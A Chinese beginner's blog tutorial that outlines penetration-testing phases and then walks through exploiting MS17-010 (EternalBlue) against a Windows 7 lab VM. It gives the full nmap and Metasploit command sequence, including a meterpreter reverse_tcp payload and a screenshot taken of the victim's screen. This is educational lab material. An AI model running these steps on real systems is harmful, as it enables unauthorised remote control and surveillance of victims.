网络安全新手入门第二天

1,780 阅读7分钟

渗透测试+MS17-010(永恒之蓝)漏洞复现

渗透测试

什么是渗透滴干活

正式一点,渗透测试(Penetration Testing),就是一种通过模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方法。

简单来讲就是模拟黑客用尽各种手段,来对目标进行入侵、攻击。

渗透测试分为

  • 黑盒测试(相当于外部黑客攻击,什么都不知道)
  • 白盒测试(相当于内部人员干坏事,基本知晓所有情报)
  • 灰盒测试(相当于里应外合,知道一些情报。有内鬼!终止交易!)

渗透测试流程

  1. 前期交互阶段

在前期交互(Pre-EngagementInteraction)阶段,渗透测试团队与客户组织进行交互讨论,最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。

  1. 情报搜集阶段

在目标范围确定之后,将进入情报搜集(InformationGathering)阶段,渗透测试团队可以利用各种信息来源与搜集技术方法,尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。渗透测试者可以使用的情报搜集方法包括公开来源信息查询、GoogleHacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。而对目标系统的情报探查能力是渗透测试者一项非常重要的技能,情报搜集是否充分在很大程度上决定了渗透测试的成败,因为如果你遗漏关键的情报信息,你将可能在后面的阶段里一无所获。

3.威胁建模阶段

在搜集到充分的情报信息之后,渗透测试团队的成员们停下敲击键盘,大家聚到一起针对获取的信息进行威胁建模(ThreatModeling)与攻击规划。这是渗透测试过程中非常重要,但很容易被忽视的一个关键点。通过团队共同的缜密情报分析与攻击思路头脑风暴,可以从大量的信息情报中理清头绪,确定出最可行的攻击通道。

4.漏洞分析阶段

在确定出最可行的攻击通道之后,接下来需要考虑该如何取得目标系统的访问控制权,即漏洞分析(VulnerabilityAnalysis)阶段。在该阶段,渗透测试者需要综合分析前几个阶段获取并汇总的情报信息,特别是安全漏洞扫描结果、服务查点信息等,通过搜索可获取的渗透代码资源,找出可以实施渗透攻击的攻击点,并在实验环境中进行验证。在该阶段,高水平的渗透测试团队还会针对攻击通道上的一些关键系统与服务进行安全漏洞探测与挖掘,期望找出可被利用的未知安全漏洞,并开发出渗透代码,从而打开攻击通道上的关键路径。

5.渗透攻击阶段

渗透攻击(Exploitation)是渗透测试过程中最具有魅力的环节。在此环节中,渗透测试团队需要利用他们所找出的目标系统安全漏洞,来真正入侵系统当中,获得访问控制权。渗透攻击可以利用公开渠道可获取的渗透代码,但一般在实际应用场景中,渗透测试者还需要充分地考虑目标系统特性来定制渗透攻击,并需要挫败目标网络与系统中实施的安全防御措施,才能成功达成渗透目的。在黑盒测试中,渗透测试者还需要考虑对目标系统检测机制的逃逸,从而避免造成目标组织安全响应团队的警觉和发现。

6.后渗透攻击阶段

后渗透攻击(PostExploitation)是整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节。前面的环节可以说都是在按部就班地完成非常普遍的目标,而在这个环节中,需要渗透测试团队根据目标组织的业务经营模式、保护资产形式与安全防御计划的不同特点,自主设计出攻击目标,识别关键基础设施,并寻找客户组织最具价值和尝试安全保护的信息和资产,最终达成能够对客户组织造成最重要业务影响的攻击途径。在不同的渗透测试场景中,这些攻击目标与途径可能是千变万化的,而设置是否准确并且可行,也取决于团队自身的创新意识、知识范畴、实际经验和技术能力。

7.撰写报告阶段

渗透测试过程最终向客户组织提交,取得认可并成功获得合同付款的就是一份渗透测试报告(Reporting)。这份报告凝聚了之前所有阶段之中渗透测试团队所获取的关键情报信息、探测和发掘出的系统安全漏洞、成功渗透攻击的过程,以及造成业务影响后果的攻击途径,同时还要站在防御者的角度上,帮助他们分析安全防御体系中的薄弱环节、存在的问题,以及修补与升级技术方案。

MS17-010(永恒之蓝)漏洞复现

光讲虚的没有用,还得多实战

环境

  • 攻击机:Kali-Linux-2021 虚拟机IP:10.0.0.3
  • 靶机:Windows7 虚拟机IP:10.0.0.1

工具

  • Nmap 网络扫描工具
  • Metasploit 渗透框架,能获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具

开始复现

  • 首先打开kali的终端,切换至管理员权限
sudo su
image.png
  • 然后使用Nmap工具进行扫描
nmap -T4 -A -v -Pn 10.0.0.1
image.png

可以发现对方的445端口是开放的,我们可以尝试进行ms17-010漏洞攻击

  • 通过命令启动Metasploit
msfconsole
image.png

启动成功后就可以使用里面的模块了

  • 搜索里面有关ms17-010的有关模块
search ms17-010
image.png
  • exploit是攻击模块,auxiliary是辅助模块,这里我们先选用3辅助扫描模块,来确定漏洞是否存在
use 3
image.png
  • 然后查看该模块需要修改的参数
show options
image.png

required中yes选项是必须要填的,可以看到缺少了RHOSTS

  • 设置目标
set rhosts 10.0.0.1
image.png

现在再去查看参数的话就可以发现RHOSTS已经填好了,这里就不进行演示了

  • 直接运行扫描模块
run
image.png

扫描结果显示,主机存在ms17-010!那就不要怪我们不客气啦!

  • 使用攻击模块
use 0
image.png

可以看到已经切换到攻击模块下了

  • 查看参数信息
show options
image.png
  • 设置攻击载荷,这里默认为windows/x64/meterpreter/reverse_tcp,然后设置受害者IP,攻击者IP
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 10.0.0.1
set lhost 10.0.0.3
image.png
  • 检查参数配置无误后就可以进行攻击了
run
image.png

攻击成功,接下来就可以使用meterpreter进行一系列后渗透操作了。

让我们来看看“小帅”在干嘛

  • 截屏
screenshot
image.png

然后小帅的屏幕就被我截下来放在桌面了,让我来看一看他在做什么

image.png

原来小帅也是个爱学习的人啊,值得鼓励!

MS17-010漏洞防范

  • 打开防火墙
  • 安装安全软件
  • 安装相应的补丁

声明

以上内容仅代表作者个人观点,本文仅作为网络安全学习参考。